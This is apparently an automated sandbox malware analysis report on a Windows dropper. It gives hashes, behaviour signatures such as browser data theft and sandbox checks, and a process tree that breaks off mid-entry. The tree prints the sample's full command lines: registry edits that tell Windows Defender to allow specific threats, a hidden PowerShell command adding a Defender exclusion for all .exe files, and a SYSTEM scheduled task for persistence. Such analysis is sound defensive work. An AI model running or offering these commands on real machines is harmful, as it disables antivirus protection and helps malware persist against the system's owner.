Analysis

  • max time kernel
    212s
  • max time network
    298s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    08/08/2024, 22:46

General

  • Target

    d61184a2cf9f0084c7d79b60f9dfca96f22057768f984a69581259a713e33013.exe

  • Size

    7.2MB

  • MD5

    37b560f46ecc7238684f001a089f1394

  • SHA1

    bcfc02ef0d77610116e9b0497f3786ac5ab90a0f

  • SHA256

    d61184a2cf9f0084c7d79b60f9dfca96f22057768f984a69581259a713e33013

  • SHA512

    8b35d693e3b690808e6649eaf99e7414ee134244242b7113aeededc755e54658e46cd39362915cb643b677e05474d36f69b211e4bea5cf9d237271bc1d72e4d9

  • SSDEEP

    196608:91OD5Fr3enGFq3MBeA8EmwAP+11+AKtSJrbnGkvzCJa:3OD5Fr3qG08BlmwAC1lNrLeJa

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 17 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 35 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 58 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d61184a2cf9f0084c7d79b60f9dfca96f22057768f984a69581259a713e33013.exe
    "C:\Users\Admin\AppData\Local\Temp\d61184a2cf9f0084c7d79b60f9dfca96f22057768f984a69581259a713e33013.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4144
    • C:\Users\Admin\AppData\Local\Temp\7zS62E0.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1872
      • C:\Users\Admin\AppData\Local\Temp\7zS659F.tmp\Install.exe
        .\Install.exe /rsZdidT "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:236
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2984
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:5012
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3684
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                  PID:2584
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              • Suspicious use of WriteProcessMemory
              PID:4988
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:988
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:4948
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              • Suspicious use of WriteProcessMemory
              PID:2824
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:964
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:1760
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              • Suspicious use of WriteProcessMemory
              PID:1892
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:3320
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                  7⤵
                    PID:4240
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                5⤵
                • Indirect Command Execution
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:5076
                • C:\Windows\SysWOW64\cmd.exe
                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1388
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:3856
                    • C:\Windows\SysWOW64\gpupdate.exe
                      "C:\Windows\system32\gpupdate.exe" /force
                      8⤵
                      • System Location Discovery: System Language Discovery
                      PID:2672
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
              4⤵
              • Indirect Command Execution
              • Suspicious use of WriteProcessMemory
              PID:4268
              • C:\Windows\SysWOW64\cmd.exe
                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:3604
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4352
                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                    7⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:368
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /CREATE /TN "bJaUjLwxLUDwMvBjjy" /SC once /ST 22:48:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS659F.tmp\Install.exe\" rv /WdidAc 525403 /S" /V1 /F
              4⤵
              • Drops file in Windows directory
              • Scheduled Task/Job: Scheduled Task
              PID:3036
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 236 -s 944
              4⤵
              • Program crash
              PID:3880
      • C:\Users\Admin\AppData\Local\Temp\7zS659F.tmp\Install.exe
        C:\Users\Admin\AppData\Local\Temp\7zS659F.tmp\Install.exe rv /WdidAc 525403 /S
        1⤵
        • Executes dropped EXE
        • Drops desktop.ini file(s)
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Modifies data under HKEY_USERS
        PID:556
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          2⤵
            PID:64
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
              3⤵
              • Indirect Command Execution
              PID:4992
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                4⤵
                  PID:4772
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                    5⤵
                      PID:4764
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                  3⤵
                  • Indirect Command Execution
                  PID:4924
                  • C:\Windows\SysWOW64\cmd.exe
                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                    4⤵
                      PID:2120
                      • \??\c:\windows\SysWOW64\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:1544
                  • C:\Windows\SysWOW64\forfiles.exe
                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                    3⤵
                    • Indirect Command Execution
                    PID:2716
                    • C:\Windows\SysWOW64\cmd.exe
                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:1112
                      • \??\c:\windows\SysWOW64\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:4732
                  • C:\Windows\SysWOW64\forfiles.exe
                    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                    3⤵
                    • Indirect Command Execution
                    • System Location Discovery: System Language Discovery
                    PID:524
                    • C:\Windows\SysWOW64\cmd.exe
                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                      4⤵
                        PID:1616
                        • \??\c:\windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:4708
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                      3⤵
                      • Indirect Command Execution
                      • System Location Discovery: System Language Discovery
                      PID:3208
                      • C:\Windows\SysWOW64\cmd.exe
                        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                        4⤵
                          PID:5068
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell start-process -WindowStyle Hidden gpupdate.exe /force
                            5⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • System Location Discovery: System Language Discovery
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5072
                            • C:\Windows\SysWOW64\gpupdate.exe
                              "C:\Windows\system32\gpupdate.exe" /force
                              6⤵
                                PID:1760
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                        2⤵
                        • Drops file in System32 directory
                        • System Location Discovery: System Language Discovery
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1640
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                          3⤵
                            PID:2816
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:1072
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:2556
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:8
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:3856
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                            3⤵
                              PID:1388
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:3512
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                              3⤵
                                PID:2984
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                3⤵
                                  PID:4956
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                  3⤵
                                    PID:520
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1620
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                    3⤵
                                      PID:2356
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1360
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4908
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4392
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4596
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                      3⤵
                                        PID:420
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:424
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                        3⤵
                                          PID:2596
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                          3⤵
                                            PID:5088
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                            3⤵
                                              PID:5080
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                              3⤵
                                                PID:3008
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:4476
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                3⤵
                                                  PID:3640
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3848
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                  3⤵
                                                    PID:3572
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:508
                                                  • C:\Windows\SysWOW64\reg.exe
